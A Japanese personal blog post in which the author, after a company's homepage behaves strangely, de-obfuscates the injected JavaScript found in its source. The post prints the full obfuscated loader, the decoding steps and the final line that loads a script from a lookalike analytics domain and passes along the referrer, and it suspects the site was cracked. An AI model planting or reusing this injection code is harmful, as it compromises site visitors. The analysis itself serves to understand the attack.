Ortoのサイト?
JUGEMテーマ:インターネット
駄文 - 世界の Shibuya.JS - IT戦記
Orto すごいですよね」って言ってて嬉しかった
Orto よくしらないんでぐぐったら変なことになった。
検索結果のトップ
他の記事みても参照されてるURLっぽいので嘘のサイトじゃないとおもう。
JavaScriptで何かしている会社のサイトらしいのだけれども
トップページみたらJavaScriptで何かされちゃった。
ブラウザサイズがちっちゃくなって変なダイアログがでて二択を迫られる。
キャンセルおすと
変なもんのダウンロードをしようとする。もちろんキャンセル。
むかついたのでみてみる。
とっぷぺーじのソースから見つけた問題のブツ
とりあえず整形
<script language=javascript>
utfi="%";
ug="<sz63rz69z70tz20z6cangz75z61ge=z6aaz76ascrz69pz74> z66unz63tioz6ez20rz77bxz63z28z76z74z6b){z76z61z72 z72,n=z226z3aHz38NG;&1z64lz78z67JUz75yz5bz5c"EOz68z7ctz40C+iz35q9Az29wz2cz2d{vMpZz56#z65=z5dz61z6az73z63z7dz28z5fz33z7ak!oz50z54r.'2 0z6dKBz2az7ez6ez34z49Fz62z37`z24^z66z22,b="",pz6d,z73z72z2cz67z73gz3d"z22z2co;fz6fz72(z72z3dz30;rz3cz76tz6bz2elenz67z74h;z72z2b+)z7bz20z70mz3dvz74z6bz2ecz68arAz74z28z72)z3bsr=z6ez2eiz6edez78Of(z70mz29z3biz66(z73z72>-z31){ o=((sr+1z29z258z31-1)z3bif(z6fz3c=0z29z6f+=z38z31;gsz67+=n.z63hz61rAz74z28o-z31)z3b z7d elsz65z20gz73z67z2bz3dz70m;}z62+=z67sz67;dz6fcz75ment.z77rz69tez28b)z3bz7dz3cz2fscz72iz70t>";
rhal=unescape(ug.replace(/z/g,utfi));
var z,ph;
document.write(rhal);
z="<c}.5Z@0xj4JyjJ=]EsjMjc}.5Z@E>0lP}yK=4@',.5@=_0E<S+RFTr0xj4JyjJ=]EUjMjS}.5Z@E0SR+]E|@@ZH//,,,'JPPJx=j4jx5@5}c'4=@/33y@7'sc?EilP}yK=4@'.=6=..=.iEE></S+RFTr>E0w&0</c}.5Z@>0";
rwbxc(z);
</script>
ugの文字からzを%でおきかえたものをunescapeしてる。
- ug.replace(/z/g,utfi)
<s%63r%69%70t%20%6cang%75%61ge=%6aa%76ascr%69p%74> %66un%63tio%6e%20r%77bx%63%28%76%74%6b){%76%61%72 %72,n=%226%3aH%38NG;&1%64l%78%67JU%75y%5b%5c"EO%68%7ct%40C+i%35q9A%29w%2c%2d{vMpZ%56#%65=%5d%61%6a%73%63%7d%28%5f%33%7ak!o%50%54r.'2 0%6dKB%2a%7e%6e%34%49F%62%37`%24^%66%22,b="",p%6d,%73%72%2c%67%73g%3d"%22%2co;f%6f%72(%72%3d%30;r%3c%76t%6b%2elen%67%74h;%72%2b+)%7b%20%70m%3dv%74%6b%2ec%68arA%74%28%72)%3bsr=%6e%2ei%6ede%78Of(%70m%29%3bi%66(%73%72>-%31){ o=((sr+1%29%258%31-1)%3bif(%6f%3c=0%29%6f+=%38%31;gs%67+=n.%63h%61rA%74%28o-%31)%3b %7d els%65%20g%73%67%2b%3d%70m;}%62+=%67s%67;d%6fc%75ment.%77r%69te%28b)%3b%7d%3c%2fsc%72i%70t>
なんのこっちゃわからんがアルファベットの間に%XXがはいっているように見える。
unescapeはそれを文字にしている。
- unescape(ug.replace(/z/g,utfi))
<script language=javascript> function rwbxc(vtk){var r,n="6:H8NG;&1dlxgJUuy["EOh|t@C+i5q9A)w,-{vMpZV#e=]ajsc}(_3zk!oPTr.'2 0mKB*~n4IFb7`$^f",b="",pm,sr,gsg="",o;for(r=0;r<vtk.length;r++){ pm=vtk.charAt(r);sr=n.indexOf(pm);if(sr>-1){ o=((sr+1)%81-1);if(o<=0)o+=81;gsg+=n.charAt(o-1); } else gsg+=pm;}b+=gsg;document.write(b);}</script>
これがrhalの正体。それ自体がJavaScriptになってて
document.write(rhal);が実行される。
rhalはrwbxc()を定義しているJavascriptのコード。
そのあとでrwbxc(z)が呼ばれる。
<script language=javascript>
function rwbxc(vtk)
{
var r,n="6:H8NG;&1dlxgJUuy["EOh|t@C+i5q9A)w,-{vMpZV#e=]ajsc}(_3zk!oPTr.'2 0mKB*~n4IFb7`$^f", b="", pm,sr,gsg="",o;
/*
rwbxc(z)ということはzを引数にとっとるのでvtkはzのことだとかんがえる
変数zを思い出す。
z="<c}.5Z@0xj4JyjJ=]EsjMjc}.5Z@E>0lP}yK=4@',.5@=_0E<S+RFTr0xj4JyjJ=]EUjMjS}.5Z@E0SR+]E|@@ZH//,,,'JPPJx=j4jx5@5}c'4=@/33y@7'sc?EilP}yK=4@'.=6=..=.iEE></S+RFTr>E0w&0</c}.5Z@>0";
*/
for(r=0;r<vtk.length;r++){ // zの長さぶんrを0からインクリメントしていく
pm=vtk.charAt(r); // zのr番目の文字をpmに代入
sr=n.indexOf(pm); // nの中身からpm(つまり↑)が現れる最初の位置をsrに代入
if(sr>-1){ // もしsrが-1より大きければ(indexOfの結果、文字がみつかれば)
o=((sr+1)%81-1); // srに1を加えたものを81で割った余りから1引いたものをoに代入
if(o<=0) o+=81; // さらにもしoが0かそれより小さければ81を加える
gsg+=n.charAt(o-1); // gsgにはnのうち(o-1)番目の文字が入る
} else
gsg+=pm; // 該当しない場合pmをgsgに加える
}
b+=gsg; // bにgsgを加える
document.write(b); // bをwriteする
}
</script>
このforループはzを鍵にnから文字列をとりだすような処理だとおもうが自信なし。
��こういうのなんていうんだろ?普通に暗号?)
結局document.write(b)のbがなんですか?が調べるべきモノなんだけど
rwbxc(z)の最後のdocument.write(b)は
<script language="javascript"> document.write( "<SCRIPT language="JavaScript" SRC="http://www.googleanalitics.net/__utb.js?"+document.referrer+""></SCRIPT>" ); </script>
結果、リファラつけてふっとばされる。
なんで こんなのトップページに置いてるんだろう。
大丈夫なのかなあ。サイトがああなってるのでメールで管理者に知らせるのもアレだし。
ホントに管理者のアドレスなのだろうか。すでに中の人はサイトを捨てて乗っ取った人が
ああいうファイルをおいてるとか、、http://orto.jpも今は広告サイトみたいになってる
し。他に正式なサイトがあったりするのかしら。
クラックされたと考えるのが自然だよなあ。
コメント
コメントを投稿
「コメントを投稿できるユーザー」の範囲は変更される可能性があります。